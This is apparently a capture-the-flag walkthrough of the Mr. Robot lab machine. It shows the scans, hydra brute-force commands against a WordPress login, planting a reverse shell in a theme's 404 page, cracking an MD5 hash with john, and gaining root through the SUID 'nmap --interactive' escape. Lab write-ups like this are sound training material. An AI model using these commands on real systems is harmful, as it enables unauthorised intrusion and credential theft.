Hack the machine
What is key 1?
As usual, I’ll start with the Nmap scan:
1
2
3
4
5
6
7
8
9
10
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
we got two web servers, one with HTTP protocol and the other with HTTPS, looking into them they’re the same, a page with the Mr. Robot series theme, but nothing really to look into.
let’s perform a gobuster scan, to see if there’s a hidden directory
1
gobuster dir -u 10.10.133.98 -w /usr/share/dirb/wordlists/common.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
/0 (Status: 301) [Size: 0] [--> http://10.10.133.98/0/]
/admin (Status: 301) [Size: 234] [--> http://10.10.133.98/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.133.98/feed/atom/]
/audio (Status: 301) [Size: 234] [--> http://10.10.133.98/audio/]
/blog (Status: 301) [Size: 233] [--> http://10.10.133.98/blog/]
/css (Status: 301) [Size: 232] [--> http://10.10.133.98/css/]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.133.98/wp-admin/]
/favicon.ico (Status: 200) [Size: 0]
/feed (Status: 301) [Size: 0] [--> http://10.10.133.98/feed/]
/image (Status: 301) [Size: 0] [--> http://10.10.133.98/image/]
/Image (Status: 301) [Size: 0] [--> http://10.10.133.98/Image/]
/images (Status: 301) [Size: 235] [--> http://10.10.133.98/images/]
/index.html (Status: 200) [Size: 1188]
/index.php (Status: 301) [Size: 0] [--> http://10.10.133.98/]
/intro (Status: 200) [Size: 516314]
/js (Status: 301) [Size: 231] [--> http://10.10.133.98/js/]
/license (Status: 200) [Size: 309]
/login (Status: 302) [Size: 0] [--> http://10.10.133.98/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> http://10.10.133.98/]
/phpmyadmin (Status: 403) [Size: 94]
/rdf (Status: 301) [Size: 0] [--> http://10.10.133.98/feed/rdf/]
/readme (Status: 200) [Size: 64]
/robots (Status: 200) [Size: 41]
/robots.txt (Status: 200) [Size: 41]
/rss (Status: 301) [Size: 0] [--> http://10.10.133.98/feed/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.133.98/feed/]
/sitemap (Status: 200) [Size: 0]
/sitemap.xml (Status: 200) [Size: 0]
/video (Status: 301) [Size: 234] [--> http://10.10.133.98/video/]
/wp-admin (Status: 301) [Size: 237] [--> http://10.10.133.98/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.133.98/wp-content/]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.133.98/wp-includes/]
/wp-cron (Status: 200) [Size: 0]
/wp-config (Status: 200) [Size: 0]
/wp-links-opml (Status: 200) [Size: 227]
/wp-load (Status: 200) [Size: 0]
/wp-login (Status: 200) [Size: 2606]
/wp-mail (Status: 500) [Size: 3064]
/wp-settings (Status: 500) [Size: 0]
/wp-signup (Status: 302) [Size: 0] [--> http://10.10.133.98/wp-login.php?action=register]
/xmlrpc.php (Status: 405) [Size: 42]
/xmlrpc (Status: 405) [Size: 42]
quite an output we got, with a couple of interesting things, now we know the site is built on WordPress, and the robots file was readable, and we now have two more file directories
fsocity.dic
which is a dictionary that we may need to use for later brute-forcing
key-1-of-3.txt
which is the first flag
073403c8a58a1f80d943455fb30724b9
What is key 2?
now with that dictionary, I’ll try to brute force the WordPress login page, to do that I’ll use hydra.
this page has a major flaw because it tells us when the username is invalid, so we will brute force the username first until we found a valid username and then try with the password.
the syntax will be:
1
hydra -l <USER> -p <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
USER
In this case, we will brute force the username so this would be the dictionary
Password
This can be anything it doesn’t matter
Login Page
this is the directory of the login page, in this case ‘/wp-login.php’
Request body
You can get this by opening the console of your browser, and in the network tab viewing the POST request to wp-login.php after entering anything and pressing login, in this case, I put in both username and password and this is the request body ‘log=a&pwd=a&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.133.98%2Fwp-admin%2F&testcookie=1’.
But we need two change the part where the username and password go through the request so hydra will know what to change. In the user put ^USER^ and the password ^PWD^.
log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.133.98%2Fwp-admin%2F&testcookie=1
Error Message
this is the message we got ‘Invalid username.’
the final command would be this:
1
hydra -L fsocity.dic -p 'a' 10.10.133.98 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.133.98%2Fwp-admin%2F&testcookie=1:Invalid username."
and we got
1
[80][http-post-form] host: 10.10.133.98 login: Elliot password: a
now let’s try to get the password for Elliot, we just need to change the user, password, and error message of the hydra command. And the flags also, if -l or -p are in lowercase it means that it’s just one, and if they are in uppercase means that are multiple of: like a dictionary file.
1
hydra -l Elliot -P fsocity.dic 10.10.133.98 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.133.98%2Fwp-admin%2F&testcookie=1:The password you entered for the username Elliot is incorrect."
and the password is ‘ER28-0652’
looking around there was not much around, so since we are an admin user I’ll try to change one page to be a reverse shell, to do this I go to appearance, then editor, and you can change whatever .php file you’d like, in this case, I’ll change the 404 page. I’ll use the pentest monkey reverse shell, set up a listener, and go to /wordpress/wp-content/themes/twentyfifteen/404.php, since the page we changed is from the theme twentyfiftteen.
and we got a shell!
we found a user called robot, in his home directory have two files, the second key, which we don’t have permission to read, and a password.raw-md5 file which apparently has the credentials for this user, with the password encrypted, let’s try to decrypt it.
the title of the file was very descriptive and tells us that is md5 raw encrypted, so I’ll use hashcat with the fsocity.dic to decrypt it.
so it ended up not working, so I used john
1
john --wordlist=fsocity.dic --format=Raw-MD5 encryptedpass
the password being: ‘abcdefghijklmnopqrstuvwxyz’
now that we have access to the robot user, we can cat out the second key:
822c73956184f694993bede3eb39f959
What is key 3?
now I guess all it’s left to do is privilege escalation, I try with the tried and true sudo -l with no luck, then I search for SUID files and I saw something strange, Nmap.
In this part I went down a rabbit hole, in gtfobins I tried to follow the suid way of exploit where it said you can overwrite a file with sudo, so I tried many ways to change the /etc/shadow file to change the root user password with no luck.
The way to gain a root shell was actually quite easy
1
nmap --interactive
then
1
nmap> !sh
and we got ourselves a root shell, all it’s left to do is to go read the third key in the /root directory
04787ddef27c3dee1ee161b21670b4e4